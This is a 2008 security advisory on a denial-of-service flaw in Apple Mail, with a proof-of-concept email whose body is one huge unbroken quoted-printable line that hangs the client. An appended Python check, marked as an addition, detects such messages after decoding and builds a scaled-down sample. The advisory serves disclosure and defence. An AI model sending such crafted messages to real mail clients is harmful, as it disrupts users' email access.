applemail-dos.txt

2008-05-30T00:00:00
ID PACKETSTORM:66831
Type packetstorm
Reporter David Wharton
Modified 2008-05-30T00:00:00

Description

***Summary***  
  
A maliciously crafted e-mail message can cause a denial of service in   
multiple versions of the Apple Mail email client.  
  
***Scope***  
  
Apple Mail version 3.1 (914/915)  
Apple Mail version 3.2 (919/919.2)  
  
Note: other versions of this product may be vulnerable as well; I have   
not tested them. The vendor has been made aware of this issue and has   
chosen not to treat it as a security issue.  
  
Interestingly enough, a similar issue seems to be present in multiple   
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611).   
The exploit provided in this advisory will also cause a denial of   
service condition on multiple versions of IBM Lotus Notes. IBM has   
been kind enough to create SPR# PRAD7DPKLW to address the issue the   
exploit targets.  
  
***Description***  
  
An e-mail message with a maliciously crafted body (in my tests I used a   
long line) can cause the e-mail client to hang, resulting in a denial   
of service condition. Testing with e-mails whose body contains no   
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a single   
line of 1.5 MB can cause the e-mail clients to hang for over half   
an hour.  
  
Initial testing reveals the following:  
  
In Apple Mail, the e-mail is rendered correctly in the preview pane   
but a subsequent click on a different e-mail causes the application to   
hang.  
  
***Credits***  
  
David Wharton  
  
***References***  
  
Apple Mail  
http://www.apple.com/macosx/features/mail.html  
  
***PoC Exploit***  
  
Below is a sample e-mail with headers (some headers removed or   
modified) that causes the e-mail clients to hang as discussed. Note   
that the body is one long line: the trailing "=" characters are not   
part of it but are only there for formatting (soft line breaks), and in   
reality most of the body is one long contiguous string of A's.  
  
Subject: dos test  
MIME-Version: 1.0  
From: xxxxx@xxxxx.com  
To: xxxxx@xxxxx.com  
Date: xxxxx  
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@xxxxx.com>  
X-Mailer: xxxxx  
MIME-Version: 1.0  
Content-Type: text/html;  
    charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0  
X-CTASD-IP: xxx.xxx.xxx.xxx  
X-CTASD-Sender: xxxxx@xxxxx.com  
x-ctasd: uncategorized  
x-ctasd-vod: uncategorized  
x-ctasd-station:  
X-OriginalArrivalTime: xxxxx@  
  
  
<font   
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
<snip> (removed a few thousand 'A's)  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</   
font>N=  
OTICE: This e-mail message and all attachments transmitted with it   
may con=  
tain confidential information intended solely for the use of the   
addressee.=  
<br />=  
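A defender-side check for the pattern the advisory describes, added here as an example and not part of the advisory: the PoC body is one enormous whitespace-free run, but because the message is quoted-printable encoded, every line on the wire is short, so a filter that measures raw line length never notices it. The check below decodes each text part first and measures the longest run a client would have to lay out; the 64 KiB default limit and the sample-building helper are assumptions, and the sample it builds is a constructed small-scale stand-in, not the PoC itself.

```python
import re
import email
import email.policy
from email.message import EmailMessage

def longest_unbroken_run(text: str) -> int:
    """Length of the longest run containing no newline (0x0A, 0x0D) or space (0x20)."""
    return max((len(run) for run in re.split(r"[\r\n ]", text)), default=0)

def max_raw_line_length(raw_message: bytes) -> int:
    """Naive check: longest line of the message as it appears on the wire."""
    return max((len(line) for line in raw_message.splitlines()), default=0)

def max_decoded_line_length(raw_message: bytes) -> int:
    """Parse the MIME message, undo the transfer encoding of every text part
    (the quoted-printable soft breaks disappear here) and measure the longest
    whitespace-free run the mail client will actually have to render."""
    msg = email.message_from_bytes(raw_message, policy=email.policy.default)
    longest = 0
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True)  # bytes with the CTE removed
        if payload is None:
            continue
        text = payload.decode(part.get_content_charset() or "us-ascii", errors="replace")
        longest = max(longest, longest_unbroken_run(text))
    return longest

def flag_long_line_message(raw_message: bytes, limit: int = 64 * 1024) -> bool:
    """True if any decoded text part has a run longer than `limit` bytes.
    The 64 KiB default is an assumed threshold, far below the 1.5 MB the
    advisory reports; tune it to what the local clients tolerate."""
    return max_decoded_line_length(raw_message) > limit

def build_sample(run_length: int) -> bytes:
    """Constructed sample (not the advisory's PoC): an HTML body that is one
    unbroken run of A's, quoted-printable encoded so that, like the PoC, no
    raw line exceeds the default policy's 78-character limit."""
    msg = EmailMessage()
    msg["Subject"] = "dos test"
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg.set_content('<font size="2">' + "A" * run_length + "</font>",
                    subtype="html", charset="iso-8859-1", cte="quoted-printable")
    return bytes(msg)

if __name__ == "__main__":
    sample = build_sample(5000)
    print("longest raw line:", max_raw_line_length(sample))        # <= 78
    print("longest decoded run:", max_decoded_line_length(sample))  # 5016
    print("flagged at 4 KiB limit:", flag_long_line_message(sample, limit=4096))
```

The raw-line figure stays under 78 while the decoded run is the full body, which is why the check must run after decoding and not on the wire bytes.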
  